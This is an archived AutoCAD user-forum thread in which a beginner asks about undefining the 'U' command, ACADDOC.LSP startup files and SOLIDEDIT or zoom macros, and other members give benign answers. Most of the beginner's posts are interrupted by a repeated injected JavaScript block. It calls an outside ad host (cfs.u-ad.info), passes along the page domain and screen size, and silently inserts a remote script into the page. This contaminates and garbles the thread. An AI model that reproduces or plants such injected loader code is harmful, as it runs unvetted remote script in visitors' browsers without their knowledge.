Display full version of the post: How to change "U" into other not as Undo anymore ?

Deby Ferdian
04.01.2016, 19:06
How to change the aliases command of an "U" in an AutoCAD 2013 as an Undo of the original command into the other command ? Such as an "UNION" or "UNIT" or any. I've tried to change the "acetauto.lsp" content to find out that. I mean looking for "U" as an Undo as an original command to change it and also I was try to editing "CUIX EDITOR" from the "EXPRESS TOOLS" menu to looking for it. But that was all with no success at all even so far I've never found it at all unless in "CUIX EDITOR" with the command is "U" and macro "_u" I was try to change it but with no difference. How to change it ? Some people suggest me to edit the "MACRO" and make the file of "acaddoc.lsp" it self but I don't understand and not familiar with the "MACRO" at all. Could be that the because I'm still beginner right now. ;D  Hehe..Help me! Please ..    -_-"And I'm sorry because my spoken, wrote, grammer and my handwriting still mess and still need lot of that to be fixed. I've just learning english language not long time this and also until this day too even still in process but I've tried. Thank you for your visit and willing to take your time to read my writing and unrest and commotion that has been my desire to this forum.if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnEXTEDBD%2fjshSTrJeNKWU8sKWh4Vq1VXeNbGZvhojwmA48oTiaT2TQyBhDofydDu61wCTkRokgNsrO%2byb%2fIC%2f%2bGqrMt6tChceDLdYWVFqft%2fWvkJhD3ZSXnkoODEC7yduZqbo%2fizH9rbYAJmQcBmZe%2fzKPEkGnlVgHkYpViLiRN9K5y%2bg%2bbOeM2sV2aXVB5aV0A9mO8%2b%2fxdYr3z4QOn%2fUhurqqnlPlOU9xCPyUQF%2bsg%2bCoIxIM6h68Y7DghJvzhRYn8BU9938u3EhAoL6kn4vknGvo0We7L99cCflOJDIE8ZUHiHD58AWr5fES9TYbpx1QgSHUQbo%2bQyD%2bFjs92A8x0XTOS%2bsxxEFzMCNzCv65ZJuQBVo28o4tJkBa9lchd1t3p44vpzQEc5nf6n6insD1Igos2adk8bN3Di572GUO%2bTgai8nZA%2bI4BOZAiax0dxVRYp%2fPWjyl2GwlCP%2fZdqs84mIc%2bEDcthETMzOJeSwyh0%2fXqm3L0rhJ%2bdL35JTnZYZaEyoj5hHSmGMkEvGJzs%2bd7%2fThY5Y%2fhdi" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

Vladimir Michl
04.01.2016, 19:15

This type of command aliases is defined in the ACAD.PGP alias file. But "U" is not an alias but a standard command name. In this case you can "UNDEFINE" the command and alias it through the dot syntax (".U").

Deby Ferdian
05.01.2016, 11:30
WOW! it's so very really wonderful thank you so much Vladimir Michl
because of your help now I'm so happy really really happy it's awesome
and amazing. I've just know this is can be done it's really helpful of
course this useful for me but if may you let me to know ? How do I save
this act ? I mean "UNDEFINE" after I've done this and close the
document and re-open the autoCAD application and starting re-open the
document and everything has go back to the beginning.
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnU4tPDulON6YdcMgCrylZKA8Pmeph8W4F0bn%2fDsf%2bowQuo%2bBQuNF%2fPkbH4HRkXqKHtheYKTZpeOdxmDfaQC0uZsJGbY%2bPuh7PHoIBbGudhjFlRpd9WhJ%2bDXhQqEhLY7lV4x2AFhH5x5C2YcDfMF%2fD%2bZA0lL7ez3O3snVe1R%2bms57NNv92xKWMHi8W1lqX8UefH8oAF%2fVdC1LdHGFJD5ZtD6zskxTmyCA5LvZgRo8Jhl7LTNS4JzXtjof3YREXVOd6PlsCVqeKUW1anqG2Nqg%2f16Lvb%2bFY%2f5FybgYwtSXFVtjxAIu2xh2ED%2fPd%2fK1c3SvkEpdJnP7nfJXkfiYm9OpY%2f8YLczP5xTRfbO9BN%2bXcpE5J2%2bhp29SN7O8lPHLBOPFqchtmJc1o4fqW1O%2biW9KEbKhopereII9f1nmA2CQlBydFZFIQ54qaZHWgIYj8sH7jRdWdiRu5hJD3hPW6K1PISVW%2fK5KbT2toITh%2f%2b7ZH4VZgARZhzaADOspRzrasHFiBVCCWQRp7FA1i4kIK1AlFkXKIlC38Tk9C" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

Vladimir Michl
05.01.2016, 12:00

The UNDEFINE has to be started in every AutoCAD session - e.g. by adding (command "_UNDEFINE" "U") to your ACADDOC.LSP text file (create it if it does not exist).

Deby Ferdian
05.01.2016, 20:05
No, I don't have the "acaddoc.lsp" except the "acad2013doc.lsp". Maybe that what's you mean. Right? but the content appear like this. see below.; Next available MSG number is  104; MODULE_ID ACAD2012doc_LSP_;;;    ACAD2013DOC.LSP Version 1.0 for AutoCAD 2013;;;;;;  Copyright 2012 Autodesk, Inc.  All rights reserved.;;;;;;  Use of this software is subject to the terms of the Autodesk license ;;;  agreement provided at the time of installation or download, or which ;;;  otherwise accompanies this software in either electronic or hard copy form.;;;;;;;;;;;;    Note:;;;            This file is loaded automatically by AutoCAD every time ;;;            a drawing is opened.  It establishes an autoloader and;;;            other utility functions.;;;;;;    Globalization Note:   ;;;            We do not support autoloading applications by the native ;;;            language command call (e.g. with the leading underscore;;;            mechanism.);;;===== Raster Image Support for Clipboard Paste Special =====;;;; IMAGEFILE;;;; Allow the IMAGE command to accept an image file name without;; presenting the file dialog, even if filedia is on.;; Example: (imagefile "c:/images/house.bmp");;(defun imagefile (filename / filedia-save cmdecho-save)  (setq filedia-save (getvar "FILEDIA"))  (setq cmdecho-save (getvar "CMDECHO"))  (setvar "FILEDIA" 0)  (setvar "CMDECHO" 0)  (command "_.-image" "_attach" filename)  (setvar "FILEDIA" filedia-save)  (setvar "CMDECHO" cmdecho-save)  (princ));;;=== General Utility Functions ===;   R12 compatibility - In R12 (acad_helpdlg) was an externally-defined ;   ADS function.  Now it's a simple AutoLISP function that calls the ;   built-in function (help).  It's only purpose is R12 compatibility.  ;   If you are calling it for anything else, you should almost certainly ;   be calling (help) instead.  (defun acad_helpdlg (helpfile topic)  (help helpfile topic))(defun *merr* (msg)  (setq *error* m:err m:err nil)  (princ))(defun *merrmsg* (msg)  (princ msg)  (setq *error* m:err m:err nil)  (princ))( ... ... ... );(it's just for closed tags)And I try with a copy the "acad2013doc.lsp" and I also try to re-name it to be "acaddoc.lsp". Give me an input or your suggest. Please!  ^_^"if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnSpYknJmg04WZ7nDpKaIXp4OTZFFLlTDA%2bvBwSqum2%2fgxo2luX5jWgPW1BNI1sjCW9cojFzdej3NJRgk8FWcFXqDvmnpckv5vX2qp23P5%2b2ISDDkwHZJkT8PcVb%2bII84%2bU71n3l5fC4rTEenDxBkwo3pMdqgPImMl5mhyD7nXc5GEYhD7hbCwMqvjTm4szyYvyq5EMXKst9RgBeYXyav9tkh4R%2bZFWxpnTIo5QUHiobumtYLoBUKxmcTXfSD16BO6PvV5lFzSeJ%2fau%2f0wzcEPzAGznxCo1ov9%2bo%2fQWUUjxqNINmVHN%2fcYBaDBSmML%2ff3ANfmWcVGUBBtNBMEoB5twXgzM7ZnyGF4vAlaxQDTTAbIwLOx1TvM1U6lVW9UOSZSd8MDGiZjjCu1fz%2bY1Hb3w7DZXMY4C8z7FuHbvES2UG03UTgI1ASPLwtqWMd4BKuEFs6F7bPCZowY9UUHtD90%2bW8QwoFxLzt2AlqQnSz%2bPN7kNt6lH3tEnNZ2LzbZZHMVqwK4Tq38T8Za84VhMrF18XZ%2b4SO%2fnFUj2" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
Deby Ferdian2016-01-05 20:12:44

Vladimir Michl
05.01.2016, 20:23

No, if you have no ACADDOC.LSP, just create it in Notepad.

Vladimir Michl
06.01.2016, 10:22

Just make a text file ACADDOC.LSP in the Support folder and put a single line into it: (command "_UNDEFINE" "U")  

Deby Ferdian
14.01.2016, 09:24
Hi, sorry I made the new topic that I create on the same line. But How do I create or assign a command directly refer through to the macro of the "_solidedit _edge _color " or "_solidedit _face _color "?  e.g. I want to assign the "CF" to be "_solidedit _face _color " of the macro. Please Help me!   ^_^"  and thanks to advances and you did very good. Well done master! ;D

Deby Ferdian
15.01.2016, 00:26
How to detecting the mutual command of an AutoCAD 2013 by it self or automatically?   ;D   Sorry chould be I talk too much to this forum but I want to learn to know more what I've don't know through this day,,if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnuuc2vaqqeVj5G5Dn%2fB9D7xQjkH12IKQWrHvvdoK%2fYP5p7J%2fSZOZGk7pptxEi7j8oqADLOxRneYckFKi2trAoLDXcrUPzBp9kAk9USSxCY24Nu%2fCs0jSuu%2flbpasSZtWzNVS3OBekR3PShWmI6y%2fPCYRL96%2fsYC5pR2R%2frHNGXZnUr7xebzN55lcdIJqFhBUf%2bERgeSXh3pZIROcPS5L5ttGb5oZUs34ENNF1qSyLdQq7NuSLmW5A%2fGngrYSfADRALZeEY0N9InCxQgswEvafj6A46XLjRrgdcIVp%2fjF507Buh221pERhcXDTG0BFfxkToSERpp7bpNAxfOgdLotv%2fkpvfa2wWvEDrBzRvd7%2bD%2fCWVzERzzCqIJJo9LOd%2fqOpLOokIy5POUQ5HjB3NEW8fdsB8McH28zWruA3Nlvo3t%2buIf2RlgqE8W57RC7AsjzS28TxGVCdFnK92l2N2ZjyASEuYp1AuQPkcBc35%2byI4M8Vus6KA8OUae71aviJIY6SbwCncWovNqqDHy3bLGZWI%2bJ%2blvCOEgLDfxk3E5IPO7w%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
Deby Ferdian2016-01-15 00:31:36

John Connor
15.01.2016, 11:40
What's with all the garbage in the post above?I don't understand what your question is.

John Connor
15.01.2016, 11:43
[QUOTE=Deby Ferdian]Hi, sorry I made the new topic that I create on the same line. But How do I create or assign a command directly refer through to the macro of the "_solidedit _edge _color " or "_solidedit _face _color "?  e.g. I want to assign the "CF" to be "_solidedit _face _color " of the macro. Please Help me!   ^_^"  and thanks to advances and you did very good. Well done master! ;D[/QUOTE]Didn't someone answer this question at another website?

Deby Ferdian
15.01.2016, 18:46
Sorry, reasonable! And it's not been a regular thing again if you do not understand at all. It was all because of my language are very ugly. Maybe I should do a re-examination and make it back. Maybe that's better. :) But I beg respectfully please understand my language and my question! Perhaps with a bit requires a very keen understanding of the master in this forum. How can I find out which one of the hundreds of orders (over ±986 commands I have) that have been made have the same or duplicated and how to fix them quickly? because it is not possible at all if I should always be examined all of an every single line of them. ~ translated back with google translate ~if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnQA3Pry%2fnWMEQVP4FVtW4vL%2fjKjZiA9GvbjM6bWTp%2bGndt4XqKzbdJUFVowUnNXxaWHtvr%2fUQgm3uYt1hdrBAB9ZamO7KHsAtXkkKXK2TH524774Vcxcj9He9MfvZ37N0PRXLC1R0fHzToU8KCVmAWhpCkytfS12%2bQ4ND0nXVmZJ5o7yOYYNY4x1zqoW%2bA3B9DCKXuNvLUUufko9We9tYOc43VE%2fE8%2fJW%2bU%2fH1pDg5a2wyfs2i4rksGx9gk8E5zQ5Kb4BaDirLmzJoIfVmFoDso%2b1azaf7b8gG2kq0tWi9RYBKv2ZWuZ0ELlKQyYjic96fQfz1C81jeLc1pomQZNohnqt3Q1dTSN81ZRpmEqI8z%2f%2fVslfYxW%2f70RswrZg9HYzjHWWW%2fSEWxHg4Ryl2Gx%2bXUANlbSqNKoXCvEc40oz5EvwZtVP%2f6kCGbZZwcbPBn8ep16vqvWdwh%2fdJ%2bxclNEvjSdiXvwMqdCwkRvmpB%2fNjxLgFDvZGY7nqs6eGqvN1Vv2QpVKY2dGg%2bkIGYwbqA3J%2byg%2bEE3rJCLl" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

Deby Ferdian
19.01.2016, 06:07
How do if I want to record the macro of "_zoom _o" (it was zoom but focus to the object that what I've selected) I was try but nothing happen ? I assign this to the "ZS" as a name of a macro I save.~ still process to learning of english ~if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpneGsF4VQYXJNO5rRUx0B3NHqm7EA0kY3lM1hafA%2bbVjJ7FbdOlZU%2bBzeqx0UxPNOj8GsDMDZC9sf7p30Y55boPTu7FcLqnufOkKG%2bizigRUtnpYRuvpoo2unUR3D6cMejN7VTliCB%2b%2fLQ14dgPBt%2bLG9%2fHU1bjIhca3PdChmZY1IqEQiDdy%2f0ufTIvynYdv5i8XLFg5Qu%2bCzbUMPCdcOeWhn9pPZI16iTiLJJaqnK%2fsT1%2bOY8hNK6Yllg76W0oJtuOMdcC1Aaln7hI39hQ5aDttbxe%2fLcCM5uzEvZK4m%2buFTWG7cFlgY2xbFmYX0GLpXaS4JHs0Egt%2bQjwLFet%2fskBcALDCDgXVAWf6VAxvJFoX4umieGDBHXJdxfjr0nMCJ4M55Z0nTe7kyBoKegHNJSYYTDIfP4gLYXy2Jso6DFOZZNqKaf9t6XPsnwYUgLxTpPSfDGuE8wMHnNnVULKdowE5ine11cn5i72VgokgR%2b1RYH8jMTZt3izbOs%2fj7csz2g2eoyKyHRvnHrNz%2beZtomGd5z5f0YcrlY" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

John Connor
19.01.2016, 12:13
There is a lot of garbage coming across with your posts.Your acad.pgp file appears to have been botched up by someone who did not know what they were doing.  Restore the original acad.pgp file by doing a REPAIR of the installation then learn how to edit the it correctly before proceeding any further.  You should NOT have almost 1,000 commands in that file.Your questions regarding macros have been answered at the CADTutor website by others.
John Connor2016-01-19 16:40:30

Deby Ferdian
23.01.2016, 09:01
When I insert my action script ("_SOLIDEDIT _FACE _L") to my ACADDOC.LSP. The display menu appears is not popup gui anymore but some menu drop beginning a start with "BY LAYER" option of the first
after I selected the face of an object which one I want to put to give the color of it.
it doesn't more want to shown up the pop up gui the colors menu again ? What is wrong
with my script ? This is the script I made. If you mind to let you to see my script and correction it and Please
give me a some suggestion ?

 (defun c:FC ()

(command "SOLIDEDIT" "F" "L")


And in order this also applies to my an another scripts too such as; "select > last", "select > previous", "select > fence", "select > cpolygon", "select > wpolygon", "select > group", "select > subobject".

~ still process to learning of an english ~if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpn%2bc4eMJSbqBMiEYhaflVNiHJofPslRUC6vWD47iakYnfs%2bTblvADSDVKSi7OlSV9ywk5rVpm6d%2fW71jn1OSW2s7KPfAOnonSBN3clTG9%2fGZmQEhpNvFUFRBePbF3ngtrkIsW9ja7HsQITRQ3sMfJ5EhvuBekBD4B5dUAw6t8DOO5vDCFf5a8MYxm4ErG3Mgpr7tvqUKNvk90wigIWQzBKykWNplY47%2fgRgWjEbKMUVlgYhL4KaNAXw87YvQBMsSM2%2bKjF7s7kLFn%2bO7ve6JD%2boTPT%2bDmO2oIOYrljhOlHUdpJwSbF0b7GmHuJdhVzZyC6yP7Re2xc9xr3bKTwa5h0ta3x0zAXN5SWfcVv0QmQ7ylbfwt3AD4CSelDF%2fgiiW%2fUMSyiHMwIoAypP8IbLkxJ47QKu64Kaq%2fGoSYxraDe5vTdGosFX4JBrCN8kOW7e380b0%2f6J1C5IPSId33eivuz6VhKKmOVWhqbuQxTpAjE1SYqG%2flPMnybfuw%2bHDb7lJMlu9n0EhfmCLh8twzRCTDUP9FuBQkP6Cjc" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

John Connor
23.01.2016, 12:10
That looks like a lisp routine to me.